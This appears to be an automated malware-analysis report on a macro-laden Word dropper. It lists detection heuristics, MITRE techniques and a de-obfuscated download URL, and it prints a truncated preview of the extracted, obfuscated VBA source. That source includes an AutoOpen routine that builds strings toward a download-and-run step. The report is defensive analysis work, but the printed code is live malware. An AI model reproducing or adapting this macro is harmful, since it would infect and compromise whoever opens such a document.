Verdict: MALICIOUS
Risk Score: 204

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The AutoOpen macro is present, and a URL 'http://beamdream.de' was de-obfuscated from the VBA code. This suggests the macro is intended to download and execute a secondary payload from the provided URL.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6536288-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6536288-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- URL de-obfuscated from VBA string literal (1 URL) (info, OLE_VBA_OBFUSCATED_URL): A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime: junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://beamdream.de (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 151246 bytes | d7ff1475942a42245a564d1b1d89096a42f743a4d384156aa112d6c7a2c02037 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "BBMNvKJtwU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub PaPLW(iMzTT)
For Each VWFhP In FIsSru
oqzqvq = (PDXcw * Sqr(TSJLN) / 37585 / Rnd(DYpwn - CSng(NYhdzj - bidkV * cEsSw / 56099)) / (sLmzhE * qjPBB))
Next
End Sub
Sub Edqia(tavlp)
For Each pKqwK In qTCwC
ivtLfu = (cjSzz * Sqr(KrYjK) / 94212 / Rnd(zasuj - CSng(VJKhBF - FAijhv * SNpWL / 83206)) / (AORjrB * oHDwin))
Next
For Each JRBRt In JKNsB
wHkkV = (pHUutz * Sqr(DwRsb) / 65371 / Rnd(HbJvn - CSng(RSbqB - hbFVD * hPpfE / 28972)) / (EHpar * mKwHV))
Next
For Each ozQRWj In tUPiwd
VtSNc = (tYjwb * Sqr(jZOOiT) / 69310 / Rnd(PZRzS - CSng(aVDoYr - iwsrlf * EQNRqi / 94470)) / (iFjOO * wvbVv))
Next
End Sub
Sub wYUuZk(EcWXzo)
For Each SwLzHo In VrzHJ
qjBQWp = (BfvSr * Sqr(iscIh) / 67668 / Rnd(cnzjcO - CSng(aajWn - HFYbF * HlkmC / 86951)) / (BFJtj * YjACj))
Next
For Each oHica In YfczcT
Cjbps = (wqUMB * Sqr(hzGOj) / 14865 / Rnd(sJQtY - CSng(JniNf - dqsjj * tHBjbU / 90500)) / (LsBRQv * YbqlmC))
Next
End Sub
Sub Autoopen()
On Error Resume Next
For Each jNScoJ In apRXR
ACIiww = (wQmMzk * Sqr(EOBuw) / 89320 / Rnd(YnQwf - CSng(IlDjuw - pWSIp * KkSaGf / 8602)) / (ULnWaX * bOrkRM))
Next
VEYtfDYop (LMCSwb + lEzqnDz + hvtFI)
For Each cFMKTa In oZQMTb
OIaXXb = (YGYohc * Sqr(mPtRS) / 76098 / Rnd(WBjRqW - CSng(mwpwWt - ZUVhj * EzoWl / 96776)) / (BJWvA * ksGuGj))
Next
End Sub
Sub jmKip(iONvX)
For Each mftWNK In sDscZu
iIRSaO = (abRpG * Sqr(bPEoOz) / 22622 / Rnd(IrVtj - CSng(oCnJko - bZwuUI * MDbjHc / 7624)) / (zEOaij * RvZqnM))
Next
For Each nHERp In pHuuqc
FQpmH = (LDjvK * Sqr(IBIBV) / 56423 / Rnd(WoPTb - CSng(nEnrJU - FiUAGm * PAUEMu / 23969)) / (wjGZQU * NpwNz))
Next
For Each TYLZb In zajIui
GWTLHh = (GGGlkD * Sqr(zUfDt) / 79663 / Rnd(wbJik - CSng(MHRYL - XOjuip * UNNSao / 47127)) / (AFBEB * dJvJjX))
Next
End Sub
Sub PwoiZ(fAPaAO)
For Each UCjJj In LHMBPT
wuEok = (SREOYk * Sqr(vsKkf) / 1191 / Rnd(nYaama - CSng(LGDwYO - vlwap * vwPoL / 47450)) / (uTzbWP * WZTdCJ))
Next
End Sub
Attribute VB_Name = "GKBRzWl"
Sub GOJpzu(IlPNrw)
For Each JcaJlr In RSYfz
lOWLCw = (MjRhSi * Sqr(RhOpSJ) / 28699 / Rnd(Zrplu - CSng(ovlJAF - tPDKv * fZKtr / 4361)) / (EkEjN * ajpfWR))
Next
End Sub
Function lEzqnDz()
On Error Resume Next
For Each RXnjX In daXSK
XHjbOw = (iiZEqC * Sqr(MfVEjh) / 87070 / Rnd(kIldVZ - CSng(ljRuE - jqIahY * UrSzic / 11650)) / (ETidli * bpkdY))
Next
For Each cOPqn In wdpBE
mdLOsO = (szivKw * Sqr(vrXzP) / 66069 / Rnd(FuNmwz - CSng(PaBkMs - tKFnR * LTuSFr / 64343)) / (FFqlW * hjzbv))
Next
MMkcV = JRtQMG("i.hc2oc1", 50370 - 50370 + 5 + 50370 - 50370, 50370 - 50370 + 2 + 50370 - 50370)
For Each wdWjL In GDCjSL
GQlAuj = (QWKVL * Sqr(qXUJMd) / 85664 / Rnd(fizNH - CSng(kdQYm - oPEwjC * qAZTBU / 24082)) / (jjsTp * wahom))
Next
For Each nlhbFt In miGvr
vTDPDX = (DUmAiS * Sqr(sSunNt) / 68414 / Rnd(jlRmw - CSng(jJbmt - XTtBa * NdTzh / 86521)) / (KiUoSh * MnjSzQ))
Next
btflHL = JRtQMG("zmS',)(d8bgN3mc, ", 75295 - 75295 + 4 + 75295 - 75295, 75295 - 75295 + 11 + 75295 - 75295)
For Each wXKKN In tLYYtM
fFojDY = (oVMVJE * Sqr(NkjbDJ) / 99510 / Rnd(GJpTD - CSng(wFvuFs - GzAOZ * jdKoA / 17701)) / (jbpwqD * QziujU))
Next
For Each NvpjJQ In sdVCLA
vTaOd = (wnlYZd * Sqr(pcDHC) / 656 / Rnd(LOCmp - CSng(iIjHz - cccNw * XUvaJ / 31793)) / (jPAPZ * AKmuj))
Next
qcklcQFMr = JRtQMG("bBBbo-wpWR+pWRepWR+pWRnpWR(& = dsadasnM'+'m7'(( Juhwb", 10705 - 10705 + 6 + 10705 - 10705, 10705 - 10705 + 45 + 10705 - 10705)
For Each nYcGn In iaTAX
PHzif = (lFmfJ * Sqr(itGtwv) / 81561 / Rnd(wwIlvO - CSng(Sfpnj - nzSQWi * IbfHP / 82299)) / (uAkiY * pQTwM))
Next
For Each jHNNFn In Gjnai
OJmOq = (zljFE * Sqr(tjPFbf) / 55721 / Rnd(JGWNi - CSng(rc
```

... (truncated)